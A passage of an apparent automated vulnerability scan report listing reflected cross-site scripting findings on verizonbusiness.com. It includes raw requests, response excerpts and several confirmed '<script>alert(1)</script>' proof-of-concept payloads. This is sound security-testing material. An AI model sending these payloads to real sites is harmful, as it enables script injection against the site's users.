Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:08 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/694fd";ccaa30d1a0f";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.716. http://www.verizonbusiness.com/resources/1002a3a13-111-Thought+Leadership.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a13-111-Thought+Leadership.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8001'%3b296c07b7a7a was submitted in the REST URL parameter 2. This input was echoed as b8001';296c07b7a7a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/b8001'%3b296c07b7a7a HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/b8001';296c07b7a7a'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.717. http://www.verizonbusiness.com/resources/1002a3a14-111-Solutions+Briefs.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a14-111-Solutions+Briefs.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a8e2"%3b49fbf1bc128 was submitted in the REST URL parameter 1. This input was echoed as 3a8e2";49fbf1bc128 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources3a8e2"%3b49fbf1bc128/1002a3a14-111-Solutions+Briefs.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:05 GMT
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources3a8e2";49fbf1bc128/1002a3a14-111-Solutions+Briefs.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMU
...[SNIP]...

1.718. http://www.verizonbusiness.com/resources/1002a3a14-111-Solutions+Briefs.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a14-111-Solutions+Briefs.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daffc'%3ba2458a8f6e2 was submitted in the REST URL parameter 1. This input was echoed as daffc';a2458a8f6e2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesdaffc'%3ba2458a8f6e2/1002a3a14-111-Solutions+Briefs.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:16 GMT
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resourcesdaffc';a2458a8f6e2/1002a3a14-111-Solutions+Briefs.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.719. http://www.verizonbusiness.com/resources/1002a3a14-111-Solutions+Briefs.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a14-111-Solutions+Briefs.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb11e'%3b896f26dea4d was submitted in the REST URL parameter 2. This input was echoed as bb11e';896f26dea4d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/bb11e'%3b896f26dea4d HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:22 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Date: Wed, 17 Nov 2010 00:30:23 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/bb11e';896f26dea4d'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.720. http://www.verizonbusiness.com/resources/1002a3a14-111-Solutions+Briefs.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a14-111-Solutions+Briefs.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 684bd</script><script>alert(1)</script>7a12bc5c372 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a14-111-Solutions+Briefs.xml684bd</script><script>alert(1)</script>7a12bc5c372 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "fa3f273a4d5ce69f959280bf5b00b9ea"
Last-Modified: Wed, 17 Nov 2010 00:30:21 GMT
Vary: User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 65013
Date: Wed, 17 Nov 2010 00:30:21 GMT
Connection: close
Set-Cookie: BERT=VRID%3daa37653f-035e-4536-9d81-6c062831a468|VTID%3dabbe9794-f8e0-40c6-ae3e-00ded104e035|SX%3d1289955020|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:34:04 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:30:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<url>/resources/1002a3a14-111-Solutions+Briefs.xml684bd</script><script>alert(1)</script>7a12bc5c372</url>
...[SNIP]...

1.721. http://www.verizonbusiness.com/resources/1002a3a2-111-Analyst+Reports.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a2-111-Analyst+Reports.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38e9d"%3b8b89e67dee was submitted in the REST URL parameter 1. This input was echoed as 38e9d";8b89e67dee in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources38e9d"%3b8b89e67dee/1002a3a2-111-Analyst+Reports.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:27:55 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40662
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:27:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:27:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources38e9d";8b89e67dee/1002a3a2-111-Analyst+Reports.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.722. http://www.verizonbusiness.com/resources/1002a3a2-111-Analyst+Reports.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a2-111-Analyst+Reports.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 813e0'%3bb111eba958e was submitted in the REST URL parameter 1. This input was echoed as 813e0';b111eba958e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources813e0'%3bb111eba958e/1002a3a2-111-Analyst+Reports.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:28:07 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:28:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:28:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources813e0';b111eba958e/1002a3a2-111-Analyst+Reports.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.723. http://www.verizonbusiness.com/resources/1002a3a2-111-Analyst+Reports.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a2-111-Analyst+Reports.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b131d'%3b73ce3cd9ce9 was submitted in the REST URL parameter 2. This input was echoed as b131d';73ce3cd9ce9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/b131d'%3b73ce3cd9ce9 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:35 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/b131d';73ce3cd9ce9'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.724. http://www.verizonbusiness.com/resources/1002a3a2-111-Analyst+Reports.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a2-111-Analyst+Reports.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce4fa</script><script>alert(1)</script>6ebf93f296 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a2-111-Analyst+Reports.xmlce4fa</script><script>alert(1)</script>6ebf93f296 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "3c664867a30a1490a48862f46aac769b"
Last-Modified: Wed, 17 Nov 2010 00:29:32 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:29:32 GMT
Content-Length: 29608
Connection: close
Set-Cookie: BERT=VRID%3de2e355ac-d9d5-47f7-80ec-d909da45b3f0|VTID%3d67c67cb9-2135-445c-a2b5-26fff1f634d9|SX%3d1289954971|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:33:15 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:29:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<url>/resources/1002a3a2-111-Analyst+Reports.xmlce4fa</script><script>alert(1)</script>6ebf93f296</url>
...[SNIP]...

1.725. http://www.verizonbusiness.com/resources/1002a3a3-111-Case+Studies.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a3-111-Case+Studies.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36a68"%3b7245cbcc16e was submitted in the REST URL parameter 1. This input was echoed as 36a68";7245cbcc16e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources36a68"%3b7245cbcc16e/1002a3a3-111-Case+Studies.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:03 GMT
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources36a68";7245cbcc16e/1002a3a3-111-Case+Studies.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.726. http://www.verizonbusiness.com/resources/1002a3a3-111-Case+Studies.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a3-111-Case+Studies.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 805aa'%3b10bb9b1c4d0 was submitted in the REST URL parameter 1. This input was echoed as 805aa';10bb9b1c4d0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources805aa'%3b10bb9b1c4d0/1002a3a3-111-Case+Studies.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:12 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources805aa';10bb9b1c4d0/1002a3a3-111-Case+Studies.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.727. http://www.verizonbusiness.com/resources/1002a3a3-111-Case+Studies.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a3-111-Case+Studies.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcc13</script><script>alert(1)</script>48631b249a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a3-111-Case+Studies.xmldcc13</script><script>alert(1)</script>48631b249a7 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "d693d99caceb442bb9266196ae61ed09"
Last-Modified: Wed, 17 Nov 2010 00:19:13 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:19:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d58d23b65-aae0-4b7b-975e-72481d960674|VTID%3d2365ccbd-2173-46d6-8803-9e49469deee9|SX%3d1289954352|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:22:56 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:19:13 GMT
Content-Length: 63261

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<url>/resources/1002a3a3-111-Case+Studies.xmldcc13</script><script>alert(1)</script>48631b249a7</url>
...[SNIP]...

1.728. http://www.verizonbusiness.com/resources/1002a3a3-111-Case+Studies.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a3-111-Case+Studies.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29f77'%3be4bcc915404 was submitted in the REST URL parameter 2. This input was echoed as 29f77';e4bcc915404 in the application's response.

